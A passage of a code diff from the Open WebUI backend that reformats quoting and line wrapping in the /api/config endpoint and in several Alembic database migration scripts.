{chat_id}: {task_ids}") - return {"task_ids": task_ids} + log.debug(f'Task IDs for chat {chat_id}: {task_ids}') + return {'task_ids': task_ids} ################################## @@ -2104,19 +2002,19 @@ async def list_tasks_by_chat_id_endpoint( ################################## -@app.get("/api/config") +@app.get('/api/config') async def get_app_config(request: Request): user = None token = None - auth_header = request.headers.get("Authorization") + auth_header = request.headers.get('Authorization') if auth_header: cred = get_http_authorization_cred(auth_header) if cred: token = cred.credentials - if not token and "token" in request.cookies: - token = request.cookies.get("token") + if not token and 'token' in request.cookies: + token = request.cookies.get('token') if token: try: @@ -2125,10 +2023,10 @@ async def get_app_config(request: Request): log.debug(e) raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, - detail="Invalid token", + detail='Invalid token', ) - if data is not None and "id" in data: - user = Users.get_user_by_id(data["id"]) + if data is not None and 'id' in data: + user = Users.get_user_by_id(data['id']) user_count = Users.get_num_users() onboarding = False @@ -2137,55 +2035,50 @@ async def get_app_config(request: Request): onboarding = user_count == 0 return { - **({"onboarding": True} if onboarding else {}), - "status": True, - "name": app.state.WEBUI_NAME, - "version": VERSION, - "default_locale": str(DEFAULT_LOCALE), - "oauth": { - "providers": { - name: config.get("name", name) - for name, config in OAUTH_PROVIDERS.items() - } - }, - "features": { - "auth": WEBUI_AUTH, - "auth_trusted_header": bool(app.state.AUTH_TRUSTED_EMAIL_HEADER), - "enable_signup_password_confirmation": ENABLE_SIGNUP_PASSWORD_CONFIRMATION, - "enable_ldap": app.state.config.ENABLE_LDAP, - "enable_api_keys": app.state.config.ENABLE_API_KEYS, - "enable_signup": app.state.config.ENABLE_SIGNUP, - "enable_login_form": app.state.config.ENABLE_LOGIN_FORM, - "enable_websocket": ENABLE_WEBSOCKET_SUPPORT, - "enable_version_update_check": ENABLE_VERSION_UPDATE_CHECK, - "enable_public_active_users_count": ENABLE_PUBLIC_ACTIVE_USERS_COUNT, - "enable_easter_eggs": ENABLE_EASTER_EGGS, + **({'onboarding': True} if onboarding else {}), + 'status': True, + 'name': app.state.WEBUI_NAME, + 'version': VERSION, + 'default_locale': str(DEFAULT_LOCALE), + 'oauth': {'providers': {name: config.get('name', name) for name, config in OAUTH_PROVIDERS.items()}}, + 'features': { + 'auth': WEBUI_AUTH, + 'auth_trusted_header': bool(app.state.AUTH_TRUSTED_EMAIL_HEADER), + 'enable_signup_password_confirmation': ENABLE_SIGNUP_PASSWORD_CONFIRMATION, + 'enable_ldap': app.state.config.ENABLE_LDAP, + 'enable_api_keys': app.state.config.ENABLE_API_KEYS, + 'enable_signup': app.state.config.ENABLE_SIGNUP, + 'enable_login_form': app.state.config.ENABLE_LOGIN_FORM, + 'enable_websocket': ENABLE_WEBSOCKET_SUPPORT, + 'enable_version_update_check': ENABLE_VERSION_UPDATE_CHECK, + 'enable_public_active_users_count': ENABLE_PUBLIC_ACTIVE_USERS_COUNT, + 'enable_easter_eggs': ENABLE_EASTER_EGGS, **( { - "enable_direct_connections": app.state.config.ENABLE_DIRECT_CONNECTIONS, - "enable_folders": app.state.config.ENABLE_FOLDERS, - "folder_max_file_count": app.state.config.FOLDER_MAX_FILE_COUNT, - "enable_channels": app.state.config.ENABLE_CHANNELS, - "enable_notes": app.state.config.ENABLE_NOTES, - "enable_web_search": app.state.config.ENABLE_WEB_SEARCH, - "enable_code_execution": app.state.config.ENABLE_CODE_EXECUTION, - "enable_code_interpreter": app.state.config.ENABLE_CODE_INTERPRETER, - "enable_image_generation": app.state.config.ENABLE_IMAGE_GENERATION, - "enable_autocomplete_generation": app.state.config.ENABLE_AUTOCOMPLETE_GENERATION, - "enable_community_sharing": app.state.config.ENABLE_COMMUNITY_SHARING, - "enable_message_rating": app.state.config.ENABLE_MESSAGE_RATING, - "enable_user_webhooks": app.state.config.ENABLE_USER_WEBHOOKS, - "enable_user_status": app.state.config.ENABLE_USER_STATUS, - "enable_admin_export": ENABLE_ADMIN_EXPORT, - "enable_admin_chat_access": ENABLE_ADMIN_CHAT_ACCESS, - "enable_admin_analytics": ENABLE_ADMIN_ANALYTICS, - "enable_google_drive_integration": app.state.config.ENABLE_GOOGLE_DRIVE_INTEGRATION, - "enable_onedrive_integration": app.state.config.ENABLE_ONEDRIVE_INTEGRATION, - "enable_memories": app.state.config.ENABLE_MEMORIES, + 'enable_direct_connections': app.state.config.ENABLE_DIRECT_CONNECTIONS, + 'enable_folders': app.state.config.ENABLE_FOLDERS, + 'folder_max_file_count': app.state.config.FOLDER_MAX_FILE_COUNT, + 'enable_channels': app.state.config.ENABLE_CHANNELS, + 'enable_notes': app.state.config.ENABLE_NOTES, + 'enable_web_search': app.state.config.ENABLE_WEB_SEARCH, + 'enable_code_execution': app.state.config.ENABLE_CODE_EXECUTION, + 'enable_code_interpreter': app.state.config.ENABLE_CODE_INTERPRETER, + 'enable_image_generation': app.state.config.ENABLE_IMAGE_GENERATION, + 'enable_autocomplete_generation': app.state.config.ENABLE_AUTOCOMPLETE_GENERATION, + 'enable_community_sharing': app.state.config.ENABLE_COMMUNITY_SHARING, + 'enable_message_rating': app.state.config.ENABLE_MESSAGE_RATING, + 'enable_user_webhooks': app.state.config.ENABLE_USER_WEBHOOKS, + 'enable_user_status': app.state.config.ENABLE_USER_STATUS, + 'enable_admin_export': ENABLE_ADMIN_EXPORT, + 'enable_admin_chat_access': ENABLE_ADMIN_CHAT_ACCESS, + 'enable_admin_analytics': ENABLE_ADMIN_ANALYTICS, + 'enable_google_drive_integration': app.state.config.ENABLE_GOOGLE_DRIVE_INTEGRATION, + 'enable_onedrive_integration': app.state.config.ENABLE_ONEDRIVE_INTEGRATION, + 'enable_memories': app.state.config.ENABLE_MEMORIES, **( { - "enable_onedrive_personal": ENABLE_ONEDRIVE_PERSONAL, - "enable_onedrive_business": ENABLE_ONEDRIVE_BUSINESS, + 'enable_onedrive_personal': ENABLE_ONEDRIVE_PERSONAL, + 'enable_onedrive_business': ENABLE_ONEDRIVE_BUSINESS, } if app.state.config.ENABLE_ONEDRIVE_INTEGRATION else {} @@ -2197,78 +2090,74 @@ async def get_app_config(request: Request): }, **( { - "default_models": app.state.config.DEFAULT_MODELS, - "default_pinned_models": app.state.config.DEFAULT_PINNED_MODELS, - "default_prompt_suggestions": app.state.config.DEFAULT_PROMPT_SUGGESTIONS, - "user_count": user_count, - "code": { - "engine": app.state.config.CODE_EXECUTION_ENGINE, - "interpreter_engine": app.state.config.CODE_INTERPRETER_ENGINE, + 'default_models': app.state.config.DEFAULT_MODELS, + 'default_pinned_models': app.state.config.DEFAULT_PINNED_MODELS, + 'default_prompt_suggestions': app.state.config.DEFAULT_PROMPT_SUGGESTIONS, + 'user_count': user_count, + 'code': { + 'engine': app.state.config.CODE_EXECUTION_ENGINE, + 'interpreter_engine': app.state.config.CODE_INTERPRETER_ENGINE, }, - "audio": { - "tts": { - "engine": app.state.config.TTS_ENGINE, - "voice": app.state.config.TTS_VOICE, - "split_on": app.state.config.TTS_SPLIT_ON, + 'audio': { + 'tts': { + 'engine': app.state.config.TTS_ENGINE, + 'voice': app.state.config.TTS_VOICE, + 'split_on': app.state.config.TTS_SPLIT_ON, }, - "stt": { - "engine": app.state.config.STT_ENGINE, + 'stt': { + 'engine': app.state.config.STT_ENGINE, }, }, - "file": { - "max_size": app.state.config.FILE_MAX_SIZE, - "max_count": app.state.config.FILE_MAX_COUNT, - "image_compression": { - "width": app.state.config.FILE_IMAGE_COMPRESSION_WIDTH, - "height": app.state.config.FILE_IMAGE_COMPRESSION_HEIGHT, + 'file': { + 'max_size': app.state.config.FILE_MAX_SIZE, + 'max_count': app.state.config.FILE_MAX_COUNT, + 'image_compression': { + 'width': app.state.config.FILE_IMAGE_COMPRESSION_WIDTH, + 'height': app.state.config.FILE_IMAGE_COMPRESSION_HEIGHT, }, }, - "permissions": {**app.state.config.USER_PERMISSIONS}, - "google_drive": { - "client_id": GOOGLE_DRIVE_CLIENT_ID.value, - "api_key": GOOGLE_DRIVE_API_KEY.value, + 'permissions': {**app.state.config.USER_PERMISSIONS}, + 'google_drive': { + 'client_id': GOOGLE_DRIVE_CLIENT_ID.value, + 'api_key': GOOGLE_DRIVE_API_KEY.value, }, - "onedrive": { - "client_id_personal": ONEDRIVE_CLIENT_ID_PERSONAL, - ... [truncated]
backend/open_webui/migrations/env.py+11 −13 modified@@ -16,7 +16,7 @@ fileConfig(config.config_file_name, disable_existing_loggers=False) # Re-apply JSON formatter after fileConfig replaces handlers. -if LOG_FORMAT == "json": +if LOG_FORMAT == 'json': from open_webui.env import JSONFormatter for handler in logging.root.handlers: @@ -36,7 +36,7 @@ DB_URL = DATABASE_URL if DB_URL: - config.set_main_option("sqlalchemy.url", DB_URL.replace("%", "%%")) + config.set_main_option('sqlalchemy.url', DB_URL.replace('%', '%%')) def run_migrations_offline() -> None: @@ -51,12 +51,12 @@ def run_migrations_offline() -> None: script output. """ - url = config.get_main_option("sqlalchemy.url") + url = config.get_main_option('sqlalchemy.url') context.configure( url=url, target_metadata=target_metadata, literal_binds=True, - dialect_opts={"paramstyle": "named"}, + dialect_opts={'paramstyle': 'named'}, ) with context.begin_transaction(): @@ -71,15 +71,13 @@ def run_migrations_online() -> None: """ # Handle SQLCipher URLs - if DB_URL and DB_URL.startswith("sqlite+sqlcipher://"): - if not DATABASE_PASSWORD or DATABASE_PASSWORD.strip() == "": - raise ValueError( - "DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs" - ) + if DB_URL and DB_URL.startswith('sqlite+sqlcipher://'): + if not DATABASE_PASSWORD or DATABASE_PASSWORD.strip() == '': + raise ValueError('DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs') # Extract database path from SQLCipher URL - db_path = DB_URL.replace("sqlite+sqlcipher://", "") - if db_path.startswith("/"): + db_path = DB_URL.replace('sqlite+sqlcipher://', '') + if db_path.startswith('/'): db_path = db_path[1:] # Remove leading slash for relative paths # Create a custom creator function that uses sqlcipher3 @@ -91,15 +89,15 @@ def create_sqlcipher_connection(): return conn connectable = create_engine( - "sqlite://", # Dummy URL since we're using creator + 'sqlite://', # Dummy URL since we're using creator creator=create_sqlcipher_connection, echo=False, ) else: # Standard database connection (existing logic) connectable = engine_from_config( config.get_section(config.config_ini_section, {}), - prefix="sqlalchemy.", + prefix='sqlalchemy.', poolclass=pool.NullPool, )
backend/open_webui/migrations/util.py+1 −1 modified@@ -12,4 +12,4 @@ def get_existing_tables(): def get_revision_id(): import uuid - return str(uuid.uuid4()).replace("-", "")[:12] + return str(uuid.uuid4()).replace('-', '')[:12]
backend/open_webui/migrations/versions/018012973d35_add_indexes.py+16 −16 modified@@ -9,38 +9,38 @@ from alembic import op import sqlalchemy as sa -revision = "018012973d35" -down_revision = "d31026856c01" +revision = '018012973d35' +down_revision = 'd31026856c01' branch_labels = None depends_on = None def upgrade(): # Chat table indexes - op.create_index("folder_id_idx", "chat", ["folder_id"]) - op.create_index("user_id_pinned_idx", "chat", ["user_id", "pinned"]) - op.create_index("user_id_archived_idx", "chat", ["user_id", "archived"]) - op.create_index("updated_at_user_id_idx", "chat", ["updated_at", "user_id"]) - op.create_index("folder_id_user_id_idx", "chat", ["folder_id", "user_id"]) + op.create_index('folder_id_idx', 'chat', ['folder_id']) + op.create_index('user_id_pinned_idx', 'chat', ['user_id', 'pinned']) + op.create_index('user_id_archived_idx', 'chat', ['user_id', 'archived']) + op.create_index('updated_at_user_id_idx', 'chat', ['updated_at', 'user_id']) + op.create_index('folder_id_user_id_idx', 'chat', ['folder_id', 'user_id']) # Tag table index - op.create_index("user_id_idx", "tag", ["user_id"]) + op.create_index('user_id_idx', 'tag', ['user_id']) # Function table index - op.create_index("is_global_idx", "function", ["is_global"]) + op.create_index('is_global_idx', 'function', ['is_global']) def downgrade(): # Chat table indexes - op.drop_index("folder_id_idx", table_name="chat") - op.drop_index("user_id_pinned_idx", table_name="chat") - op.drop_index("user_id_archived_idx", table_name="chat") - op.drop_index("updated_at_user_id_idx", table_name="chat") - op.drop_index("folder_id_user_id_idx", table_name="chat") + op.drop_index('folder_id_idx', table_name='chat') + op.drop_index('user_id_pinned_idx', table_name='chat') + op.drop_index('user_id_archived_idx', table_name='chat') + op.drop_index('updated_at_user_id_idx', table_name='chat') + op.drop_index('folder_id_user_id_idx', table_name='chat') # Tag table index - op.drop_index("user_id_idx", table_name="tag") + op.drop_index('user_id_idx', table_name='tag') # Function table index - op.drop_index("is_global_idx", table_name="function") + op.drop_index('is_global_idx', table_name='function')
backend/open_webui/migrations/versions/1af9b942657b_migrate_tags.py+37 −48 modified@@ -13,8 +13,8 @@ import json -revision = "1af9b942657b" -down_revision = "242a2047eae0" +revision = '1af9b942657b' +down_revision = '242a2047eae0' branch_labels = None depends_on = None @@ -25,43 +25,40 @@ def upgrade(): inspector = Inspector.from_engine(conn) # Clean up potential leftover temp table from previous failures - conn.execute(sa.text("DROP TABLE IF EXISTS _alembic_tmp_tag")) + conn.execute(sa.text('DROP TABLE IF EXISTS _alembic_tmp_tag')) # Check if the 'tag' table exists tables = inspector.get_table_names() # Step 1: Modify Tag table using batch mode for SQLite support - if "tag" in tables: + if 'tag' in tables: # Get the current columns in the 'tag' table - columns = [col["name"] for col in inspector.get_columns("tag")] + columns = [col['name'] for col in inspector.get_columns('tag')] # Get any existing unique constraints on the 'tag' table - current_constraints = inspector.get_unique_constraints("tag") + current_constraints = inspector.get_unique_constraints('tag') - with op.batch_alter_table("tag", schema=None) as batch_op: + with op.batch_alter_table('tag', schema=None) as batch_op: # Check if the unique constraint already exists - if not any( - constraint["name"] == "uq_id_user_id" - for constraint in current_constraints - ): + if not any(constraint['name'] == 'uq_id_user_id' for constraint in current_constraints): # Create unique constraint if it doesn't exist - batch_op.create_unique_constraint("uq_id_user_id", ["id", "user_id"]) + batch_op.create_unique_constraint('uq_id_user_id', ['id', 'user_id']) # Check if the 'data' column exists before trying to drop it - if "data" in columns: - batch_op.drop_column("data") + if 'data' in columns: + batch_op.drop_column('data') # Check if the 'meta' column needs to be created - if "meta" not in columns: + if 'meta' not in columns: # Add the 'meta' column if it doesn't already exist - batch_op.add_column(sa.Column("meta", sa.JSON(), nullable=True)) + batch_op.add_column(sa.Column('meta', sa.JSON(), nullable=True)) tag = table( - "tag", - column("id", sa.String()), - column("name", sa.String()), - column("user_id", sa.String()), - column("meta", sa.JSON()), + 'tag', + column('id', sa.String()), + column('name', sa.String()), + column('user_id', sa.String()), + column('meta', sa.JSON()), ) # Step 2: Migrate tags @@ -70,12 +67,12 @@ def upgrade(): tag_updates = {} for row in result: - new_id = row.name.replace(" ", "_").lower() + new_id = row.name.replace(' ', '_').lower() tag_updates[row.id] = new_id for tag_id, new_tag_id in tag_updates.items(): - print(f"Updating tag {tag_id} to {new_tag_id}") - if new_tag_id == "pinned": + print(f'Updating tag {tag_id} to {new_tag_id}') + if new_tag_id == 'pinned': # delete tag delete_stmt = sa.delete(tag).where(tag.c.id == tag_id) conn.execute(delete_stmt) @@ -86,9 +83,7 @@ def upgrade(): if existing_tag_result: # Handle duplicate case: the new_tag_id already exists - print( - f"Tag {new_tag_id} already exists. Removing current tag with ID {tag_id} to avoid duplicates." - ) + print(f'Tag {new_tag_id} already exists. Removing current tag with ID {tag_id} to avoid duplicates.') # Option 1: Delete the current tag if an update to new_tag_id would cause duplication delete_stmt = sa.delete(tag).where(tag.c.id == tag_id) conn.execute(delete_stmt) @@ -98,19 +93,15 @@ def upgrade(): conn.execute(update_stmt) # Add columns `pinned` and `meta` to 'chat' - op.add_column("chat", sa.Column("pinned", sa.Boolean(), nullable=True)) - op.add_column( - "chat", sa.Column("meta", sa.JSON(), nullable=False, server_default="{}") - ) + op.add_column('chat', sa.Column('pinned', sa.Boolean(), nullable=True)) + op.add_column('chat', sa.Column('meta', sa.JSON(), nullable=False, server_default='{}')) - chatidtag = table( - "chatidtag", column("chat_id", sa.String()), column("tag_name", sa.String()) - ) + chatidtag = table('chatidtag', column('chat_id', sa.String()), column('tag_name', sa.String())) chat = table( - "chat", - column("id", sa.String()), - column("pinned", sa.Boolean()), - column("meta", sa.JSON()), + 'chat', + column('id', sa.String()), + column('pinned', sa.Boolean()), + column('meta', sa.JSON()), ) # Fetch existing tags @@ -120,29 +111,27 @@ def upgrade(): chat_updates = {} for row in result: chat_id = row.chat_id - tag_name = row.tag_name.replace(" ", "_").lower() + tag_name = row.tag_name.replace(' ', '_').lower() - if tag_name == "pinned": + if tag_name == 'pinned': # Specifically handle 'pinned' tag if chat_id not in chat_updates: - chat_updates[chat_id] = {"pinned": True, "meta": {}} + chat_updates[chat_id] = {'pinned': True, 'meta': {}} else: - chat_updates[chat_id]["pinned"] = True + chat_updates[chat_id]['pinned'] = True else: if chat_id not in chat_updates: - chat_updates[chat_id] = {"pinned": False, "meta": {"tags": [tag_name]}} + chat_updates[chat_id] = {'pinned': False, 'meta': {'tags': [tag_name]}} else: - tags = chat_updates[chat_id]["meta"].get("tags", []) + tags = chat_updates[chat_id]['meta'].get('tags', []) tags.append(tag_name) - chat_updates[chat_id]["meta"]["tags"] = list(set(tags)) + chat_updates[chat_id]['meta']['tags'] = list(set(tags)) # Update chats based on accumulated changes for chat_id, updates in chat_updates.items(): update_stmt = sa.update(chat).where(chat.c.id == chat_id) - update_stmt = update_stmt.values( - meta=updates.get("meta", {}), pinned=updates.get("pinned", False) - ) + update_stmt = update_stmt.values(meta=updates.get('meta', {}), pinned=updates.get('pinned', False)) conn.execute(update_stmt) pass
backend/open_webui/migrations/versions/242a2047eae0_update_chat_table.py+24 −34 modified@@ -12,8 +12,8 @@ import json -revision = "242a2047eae0" -down_revision = "6a39f3d8e55c" +revision = '242a2047eae0' +down_revision = '6a39f3d8e55c' branch_labels = None depends_on = None @@ -22,39 +22,37 @@ def upgrade(): conn = op.get_bind() inspector = sa.inspect(conn) - columns = inspector.get_columns("chat") - column_dict = {col["name"]: col for col in columns} + columns = inspector.get_columns('chat') + column_dict = {col['name']: col for col in columns} - chat_column = column_dict.get("chat") - old_chat_exists = "old_chat" in column_dict + chat_column = column_dict.get('chat') + old_chat_exists = 'old_chat' in column_dict if chat_column: - if isinstance(chat_column["type"], sa.Text): + if isinstance(chat_column['type'], sa.Text): print("Converting 'chat' column to JSON") if old_chat_exists: print("Dropping old 'old_chat' column") - op.drop_column("chat", "old_chat") + op.drop_column('chat', 'old_chat') # Step 1: Rename current 'chat' column to 'old_chat' print("Renaming 'chat' column to 'old_chat'") - op.alter_column( - "chat", "chat", new_column_name="old_chat", existing_type=sa.Text() - ) + op.alter_column('chat', 'chat', new_column_name='old_chat', existing_type=sa.Text()) # Step 2: Add new 'chat' column of type JSON print("Adding new 'chat' column of type JSON") - op.add_column("chat", sa.Column("chat", sa.JSON(), nullable=True)) + op.add_column('chat', sa.Column('chat', sa.JSON(), nullable=True)) else: # If the column is already JSON, no need to do anything pass # Step 3: Migrate data from 'old_chat' to 'chat' chat_table = table( - "chat", - sa.Column("id", sa.String(), primary_key=True), - sa.Column("old_chat", sa.Text()), - sa.Column("chat", sa.JSON()), + 'chat', + sa.Column('id', sa.String(), primary_key=True), + sa.Column('old_chat', sa.Text()), + sa.Column('chat', sa.JSON()), ) # - Selecting all data from the table @@ -67,41 +65,33 @@ def upgrade(): except json.JSONDecodeError: json_data = None # Handle cases where the text cannot be converted to JSON - connection.execute( - sa.update(chat_table) - .where(chat_table.c.id == row.id) - .values(chat=json_data) - ) + connection.execute(sa.update(chat_table).where(chat_table.c.id == row.id).values(chat=json_data)) # Step 4: Drop 'old_chat' column print("Dropping 'old_chat' column") - op.drop_column("chat", "old_chat") + op.drop_column('chat', 'old_chat') def downgrade(): # Step 1: Add 'old_chat' column back as Text - op.add_column("chat", sa.Column("old_chat", sa.Text(), nullable=True)) + op.add_column('chat', sa.Column('old_chat', sa.Text(), nullable=True)) # Step 2: Convert 'chat' JSON data back to text and store in 'old_chat' chat_table = table( - "chat", - sa.Column("id", sa.String(), primary_key=True), - sa.Column("chat", sa.JSON()), - sa.Column("old_chat", sa.Text()), + 'chat', + sa.Column('id', sa.String(), primary_key=True), + sa.Column('chat', sa.JSON()), + sa.Column('old_chat', sa.Text()), ) connection = op.get_bind() results = connection.execute(select(chat_table.c.id, chat_table.c.chat)) for row in results: text_data = json.dumps(row.chat) if row.chat is not None else None - connection.execute( - sa.update(chat_table) - .where(chat_table.c.id == row.id) - .values(old_chat=text_data) - ) + connection.execute(sa.update(chat_table).where(chat_table.c.id == row.id).values(old_chat=text_data)) # Step 3: Remove the new 'chat' JSON column - op.drop_column("chat", "chat") + op.drop_column('chat', 'chat') # Step 4: Rename 'old_chat' back to 'chat' - op.alter_column("chat", "old_chat", new_column_name="chat", existing_type=sa.Text()) + op.alter_column('chat', 'old_chat', new_column_name='chat', existing_type=sa.Text())
backend/open_webui/migrations/versions/2f1211949ecc_update_message_and_channel_member_table.py+28 −36 modified@@ -13,19 +13,19 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "2f1211949ecc" -down_revision: Union[str, None] = "37f288994c47" +revision: str = '2f1211949ecc' +down_revision: Union[str, None] = '37f288994c47' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # New columns to be added to channel_member table - op.add_column("channel_member", sa.Column("status", sa.Text(), nullable=True)) + op.add_column('channel_member', sa.Column('status', sa.Text(), nullable=True)) op.add_column( - "channel_member", + 'channel_member', sa.Column( - "is_active", + 'is_active', sa.Boolean(), nullable=False, default=True, @@ -34,69 +34,61 @@ def upgrade() -> None: ) op.add_column( - "channel_member", + 'channel_member', sa.Column( - "is_channel_muted", + 'is_channel_muted', sa.Boolean(), nullable=False, default=False, server_default=sa.sql.expression.false(), ), ) op.add_column( - "channel_member", + 'channel_member', sa.Column( - "is_channel_pinned", + 'is_channel_pinned', sa.Boolean(), nullable=False, default=False, server_default=sa.sql.expression.false(), ), ) - op.add_column("channel_member", sa.Column("data", sa.JSON(), nullable=True)) - op.add_column("channel_member", sa.Column("meta", sa.JSON(), nullable=True)) + op.add_column('channel_member', sa.Column('data', sa.JSON(), nullable=True)) + op.add_column('channel_member', sa.Column('meta', sa.JSON(), nullable=True)) - op.add_column( - "channel_member", sa.Column("joined_at", sa.BigInteger(), nullable=False) - ) - op.add_column( - "channel_member", sa.Column("left_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('joined_at', sa.BigInteger(), nullable=False)) + op.add_column('channel_member', sa.Column('left_at', sa.BigInteger(), nullable=True)) - op.add_column( - "channel_member", sa.Column("last_read_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('last_read_at', sa.BigInteger(), nullable=True)) - op.add_column( - "channel_member", sa.Column("updated_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('updated_at', sa.BigInteger(), nullable=True)) # New columns to be added to message table op.add_column( - "message", + 'message', sa.Column( - "is_pinned", + 'is_pinned', sa.Boolean(), nullable=False, default=False, server_default=sa.sql.expression.false(), ), ) - op.add_column("message", sa.Column("pinned_at", sa.BigInteger(), nullable=True)) - op.add_column("message", sa.Column("pinned_by", sa.Text(), nullable=True)) + op.add_column('message', sa.Column('pinned_at', sa.BigInteger(), nullable=True)) + op.add_column('message', sa.Column('pinned_by', sa.Text(), nullable=True)) def downgrade() -> None: - op.drop_column("channel_member", "updated_at") - op.drop_column("channel_member", "last_read_at") + op.drop_column('channel_member', 'updated_at') + op.drop_column('channel_member', 'last_read_at') - op.drop_column("channel_member", "meta") - op.drop_column("channel_member", "data") + op.drop_column('channel_member', 'meta') + op.drop_column('channel_member', 'data') - op.drop_column("channel_member", "is_channel_pinned") - op.drop_column("channel_member", "is_channel_muted") + op.drop_column('channel_member', 'is_channel_pinned') + op.drop_column('channel_member', 'is_channel_muted') - op.drop_column("message", "pinned_by") - op.drop_column("message", "pinned_at") - op.drop_column("message", "is_pinned") + op.drop_column('message', 'pinned_by') + op.drop_column('message', 'pinned_at') + op.drop_column('message', 'is_pinned')
backend/open_webui/migrations/versions/374d2f66af06_add_prompt_history_table.py+87 −89 modified@@ -12,8 +12,8 @@ from alembic import op import sqlalchemy as sa -revision: str = "374d2f66af06" -down_revision: Union[str, None] = "c440947495f3" +revision: str = '374d2f66af06' +down_revision: Union[str, None] = 'c440947495f3' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -26,13 +26,13 @@ def upgrade() -> None: # We need to assume the OLD structure. old_prompt_table = sa.table( - "prompt", - sa.column("command", sa.Text()), - sa.column("user_id", sa.Text()), - sa.column("title", sa.Text()), - sa.column("content", sa.Text()), - sa.column("timestamp", sa.BigInteger()), - sa.column("access_control", sa.JSON()), + 'prompt', + sa.column('command', sa.Text()), + sa.column('user_id', sa.Text()), + sa.column('title', sa.Text()), + sa.column('content', sa.Text()), + sa.column('timestamp', sa.BigInteger()), + sa.column('access_control', sa.JSON()), ) # Check if table exists/read data @@ -53,61 +53,61 @@ def upgrade() -> None: # Step 2: Create new prompt table with 'id' as PRIMARY KEY op.create_table( - "prompt_new", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("command", sa.String(), unique=True, index=True), - sa.Column("user_id", sa.String(), nullable=False), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("content", sa.Text(), nullable=False), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("access_control", sa.JSON(), nullable=True), - sa.Column("is_active", sa.Boolean(), nullable=False, server_default="1"), - sa.Column("version_id", sa.Text(), nullable=True), - sa.Column("tags", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + 'prompt_new', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('command', sa.String(), unique=True, index=True), + sa.Column('user_id', sa.String(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('content', sa.Text(), nullable=False), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('access_control', sa.JSON(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=False, server_default='1'), + sa.Column('version_id', sa.Text(), nullable=True), + sa.Column('tags', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) # Step 3: Create prompt_history table op.create_table( - "prompt_history", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("prompt_id", sa.Text(), nullable=False, index=True), - sa.Column("parent_id", sa.Text(), nullable=True), - sa.Column("snapshot", sa.JSON(), nullable=False), - sa.Column("user_id", sa.Text(), nullable=False), - sa.Column("commit_message", sa.Text(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), + 'prompt_history', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('prompt_id', sa.Text(), nullable=False, index=True), + sa.Column('parent_id', sa.Text(), nullable=True), + sa.Column('snapshot', sa.JSON(), nullable=False), + sa.Column('user_id', sa.Text(), nullable=False), + sa.Column('commit_message', sa.Text(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), ) # Step 4: Migrate data prompt_new_table = sa.table( - "prompt_new", - sa.column("id", sa.Text()), - sa.column("command", sa.String()), - sa.column("user_id", sa.String()), - sa.column("name", sa.Text()), - sa.column("content", sa.Text()), - sa.column("data", sa.JSON()), - sa.column("meta", sa.JSON()), - sa.column("access_control", sa.JSON()), - sa.column("is_active", sa.Boolean()), - sa.column("version_id", sa.Text()), - sa.column("tags", sa.JSON()), - sa.column("created_at", sa.BigInteger()), - sa.column("updated_at", sa.BigInteger()), + 'prompt_new', + sa.column('id', sa.Text()), + sa.column('command', sa.String()), + sa.column('user_id', sa.String()), + sa.column('name', sa.Text()), + sa.column('content', sa.Text()), + sa.column('data', sa.JSON()), + sa.column('meta', sa.JSON()), + sa.column('access_control', sa.JSON()), + sa.column('is_active', sa.Boolean()), + sa.column('version_id', sa.Text()), + sa.column('tags', sa.JSON()), + sa.column('created_at', sa.BigInteger()), + sa.column('updated_at', sa.BigInteger()), ) prompt_history_table = sa.table( - "prompt_history", - sa.column("id", sa.Text()), - sa.column("prompt_id", sa.Text()), - sa.column("parent_id", sa.Text()), - sa.column("snapshot", sa.JSON()), - sa.column("user_id", sa.Text()), - sa.column("commit_message", sa.Text()), - sa.column("created_at", sa.BigInteger()), + 'prompt_history', + sa.column('id', sa.Text()), + sa.column('prompt_id', sa.Text()), + sa.column('parent_id', sa.Text()), + sa.column('snapshot', sa.JSON()), + sa.column('user_id', sa.Text()), + sa.column('commit_message', sa.Text()), + sa.column('created_at', sa.BigInteger()), ) for row in existing_prompts: @@ -120,7 +120,7 @@ def upgrade() -> None: new_uuid = str(uuid.uuid4()) history_uuid = str(uuid.uuid4()) - clean_command = command[1:] if command and command.startswith("/") else command + clean_command = command[1:] if command and command.startswith('/') else command # Insert into prompt_new conn.execute( @@ -148,12 +148,12 @@ def upgrade() -> None: prompt_id=new_uuid, parent_id=None, snapshot={ - "name": title, - "content": content, - "command": clean_command, - "data": {}, - "meta": {}, - "access_control": access_control, + 'name': title, + 'content': content, + 'command': clean_command, + 'data': {}, + 'meta': {}, + 'access_control': access_control, }, user_id=user_id, commit_message=None, @@ -162,22 +162,22 @@ def upgrade() -> None: ) # Step 5: Replace old table with new one - op.drop_table("prompt") - op.rename_table("prompt_new", "prompt") + op.drop_table('prompt') + op.rename_table('prompt_new', 'prompt') def downgrade() -> None: conn = op.get_bind() # Step 1: Read new data prompt_table = sa.table( - "prompt", - sa.column("command", sa.String()), - sa.column("name", sa.Text()), - sa.column("created_at", sa.BigInteger()), - sa.column("user_id", sa.Text()), - sa.column("content", sa.Text()), - 